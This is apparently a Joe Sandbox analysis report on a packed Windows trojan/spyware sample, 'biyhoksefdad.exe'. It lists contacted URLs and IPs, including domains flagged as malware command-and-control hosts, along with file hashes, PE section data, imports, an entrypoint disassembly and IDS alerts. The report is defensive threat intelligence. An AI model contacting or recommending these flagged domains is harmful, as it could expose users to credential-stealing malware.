https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=1Vea
  Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://catterjur.run/boSnzhus
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Antivirus Detection: Avira URL Cloud: malware   Reputation: unknown

https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
  Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://univerxes.shop:443/SwnNWN
  Source: biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Antivirus Detection: Avira URL Cloud: safe   Reputation: unknown

https://www.google.com/recaptcha/
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://checkout.steampowered.com/
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
  Source: biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://catterjur.run/
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Antivirus Detection: Avira URL Cloud: malware   Reputation: unknown

https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
  Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

http://www.enigmaprotector.com/
  Source: biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, biyhoksefdad.exe, 00000000.00000002.1708761696.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
  Malicious: false   Reputation: high

https://catterjur.run/)
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Antivirus Detection: Avira URL Cloud: malware   Reputation: unknown

https://gemini.google.com/app?q=
  Source: biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://garagedrootz.top/E1o
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Antivirus Detection: Avira URL Cloud: malware   Reputation: unknown

https://store.steampowered.com/;
  Source: biyhoksefdad.exe, 00000000.00000002.1710644682.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1710644682.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://store.steampowered.com/about/
  Source: biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://community.cloudflare.steamstatic.com/
  Source: biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://steamcommunity.com/my/wishlist/
  Source: biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://t.me/
  Source: biyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: high

https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
  Source: biyhoksefdad.exe, 00000000.00000002.1710478787.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false   Reputation:
                                                                                                                                            high
                                                                                                                                            https://web.telegram.orgbiyhoksefdad.exe, 00000000.00000003.1352217904.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://steamloopback.hostbiyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://help.steampowered.com/en/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://steamcommunity.com/market/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/news/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYibiyhoksefdad.exe, 00000000.00000003.1492041549.0000000003C92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.enigmaprotector.com/openUbiyhoksefdad.exe, 00000000.00000002.1708761696.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://store.steampowered.com/subscriber_agreement/biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001014000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgbiyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://recaptcha.net/recaptcha/;biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://steamcommunity.com/discussions/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_alldp.icobiyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://store.steampowered.com/stats/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://medal.tvbiyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://broadcast.st.dl.eccdnx.combiyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://store.steampowered.com/steam_refunds/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vbiyhoksefdad.exe, 00000000.00000002.1709366776.000000000102C000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://x1.c.lencr.org/0biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://x1.i.lencr.org/0biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchbiyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pbiyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://steamcommunity.com/workshop/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://login.steampowered.com/biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allbiyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://store.steampowered.com/legal/biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://univerxes.shop/biyhoksefdad.exe, biyhoksefdad.exe, 00000000.00000003.1578076106.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1541790012.000000000101E000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1627352228.0000000001020000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1542359493.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://sterpickced.digital/zbiyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://sterpickced.digital/vbiyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://modelshiverd.icu/biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://univerxes.shop/?biyhoksefdad.exe, 00000000.00000003.1627352228.0000000001020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://recaptcha.netbiyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://ac.ecosia.org?q=biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://store.steampowered.com/biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs
IP              Domain              Country         ASN    ASN Name         Malicious
172.67.213.171  univerxes.shop      United States   13335  CLOUDFLARENETUS  true
104.73.234.102  steamcommunity.com  United States   16625  AKAMAI-ASUS      false
149.154.167.99  t.me                United Kingdom  62041  TELEGRAMRU       false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1635456
Start date and time: 2025-03-11 17:28:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: biyhoksefdad.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@11/3
                                                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        • Stop behavior analysis, all processes terminated
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 23.60.203.209, 4.245.163.56, 150.171.27.10
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, g.bing.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                        • Execution Graph export aborted for target biyhoksefdad.exe, PID 8332 because there are no executed function
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        12:29:05API Interceptor24x Sleep call for process: biyhoksefdad.exe modified
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.990756822716716 (near the 8.0 maximum: almost the whole file is packed or encrypted data)
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: biyhoksefdad.exe
File size: 1'312'768 bytes
MD5: 67af8a00aba060d6508df2389989d85d
SHA1: 455950022329a0fde1bd4c3e050f1635464cdb51
SHA256: 70870a58aa5a47c9cb1e913883e8c7e08fb49c9018dc08e05af3cad3dad203d8
SHA512: 54eaeecc53dc31b1d4b41d0dcc5b30cac6d29f601c8d9c0bee2cde2b430ad043476faa106e5faa40de3323ebae05eeb91ab2d899c1c4b96dd067e8cd484c9472
SSDEEP: 24576:7XH6QghP23MghHx6e3KVLYEbDsGM4hRAeXEm5UaZlnKKw3GQWGh:DHDgHuKVjfWmzDLlA
TLSH: 675533D5B3701D4BF12453F2E311DBB092AA3E3F909E9135C8516F8819E97A266BCB13
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g............................V.............@...........................<...........@................................. 0.....
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x408456
Entrypoint Section: (nameless; RVA 0x8456 lies inside the unnamed first section at VA 0x1000)
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE (NX_COMPAT is not set)
Time Stamp: 0x67C9DD0F [Thu Mar 6 17:36:15 2025 UTC]
TLS Callbacks: none
CLR (.Net) Version: none (native code)
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 71cc5af9daad65e58c6f29c42cdf9201
Instruction (linear-sweep disassembly starting at entrypoint 0x408456):
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00401000h
call 00007F539CB92F26h
call far 5DE5h : 8B10C483h
jmp 00007F539CF5104Fh
or dh, dl
sbb dword ptr [edi], esi
sub byte ptr [eax+533F7B84h], 0000005Dh
daa
xchg byte ptr [ebp+0Ah], ah
leave
lodsd
rcr byte ptr [ecx], cl
sbb dword ptr [esi], FFFFFF96h
pop es
popfd
xchg dword ptr [edx+ecx*4-6Ah], eax
sar dword ptr [eax], cl
inc ebp
imul edx, dword ptr [ecx+ebp*4-397BDD2Fh], 00087645h
and ecx, esi
mov dl, 02h
xchg esp, ebp
wait
xchg eax, edi
imul esi, esi, 53AE3601h
sbb dword ptr [ecx], 42510E9Ch
cmp esp, esi
jl 00007F539CB92EF1h
pop ebx
lodsd
pop esi
cwde
inc eax
loopne 00007F539CB92F7Ch
test dword ptr [ebp+42C550A9h], ebx
xchg byte ptr [edx+ebp+28CEF396h], ah
cmpsb
inc ebp
retf
inc eax
inc ebp
or eax, 77B26CDCh
mov byte ptr [8205ADFDh], al
xchg byte ptr [ecx], ah
dec ebx
inc ecx
pop es
cmp ebx, ebx
pop ss
add al, FAh
adc byte ptr [ebx-2E3D7015h], cl
cmp ecx, dword ptr [edx-62h]
test dword ptr [esi-770849BDh], ebp
jnle 00007F539CB92ECFh
or eax, C525222Fh
mov edx, 1D746E9Bh
mov seg?, word ptr [ebx+4Dh]
Only the first five instructions (a frame setup, a load of 0x401000, the start of the first section, into eax, and a call) are plausible code. From "call far" onward the disassembler is sweeping linearly through the packed, near-maximal-entropy bytes of the nameless section, so the far calls, segment-register moves and oversized immediates that follow are not program logic and should not be read as such.
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e3020 | 0x214 | .data
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e3000 | 0xc | .data
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(nameless) | 0x1000 | 0x50000 | 0x29c00 | 61f1d06c138c4d3655ff92aa19931a1c | False | 0.9997251590568862 | data | 7.998877241773601 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(nameless) | 0x51000 | 0x3000 | 0x1000 | b0490695375783f9b22c64764b12a868 | False | 0.996337890625 | data | 7.929991287486017 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(nameless) | 0x54000 | 0xd000 | 0x3000 | 533579c76e38e7498f201a4e4b5d0e13 | False | 0.978515625 | data | 7.936481889423268 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(nameless) | 0x61000 | 0x4000 | 0x2200 | 92efe3b1e27ff59ad557785651862a3c | False | 0.9801240808823529 | DOS executable (COM, 0x8C-variant) | 7.924636797507748 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(nameless) | 0x65000 | 0x27e000 | 0x2ba00 | 362f0b3a491bbdea420c775f5a8a5060 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data | 0x2e3000 | 0xe5000 | 0xe4c00 | 9dcdb363e1e3782c2ba1e11e88726c87 | False | 0.9970991290983606 | MacBinary, char. code 0x2e, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040, creator ' 0.', type ' 1.', 3682606 bytes "." , at 0x3831ae 15740974 bytes resource dBase III DBT, version number 0, next free block index 3027316, 1st item "\201\313\033\262\206%\343\307/\030\334z\224b\011\226\363\340\260\355M\370" | 7.983447049442333 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
user32.dll | MessageBoxA
advapi32.dll | RegCloseKey
oleaut32.dll | SysFreeString
gdi32.dll | CreateFontA
shell32.dll | ShellExecuteA
version.dll | GetFileVersionInfoA
ole32.dll | CoCreateInstance
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-11T17:29:05.556677+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 149.154.167.99 | 443 | TCP
2025-03-11T17:29:07.267963+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49709 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:09.470403+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49710 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:14.328987+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49711 | 172.67.213.171 | 443 | TCP
2025-03-11T17:29:18.163033+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49712 | 172.67.213.171 | 443 | TCP
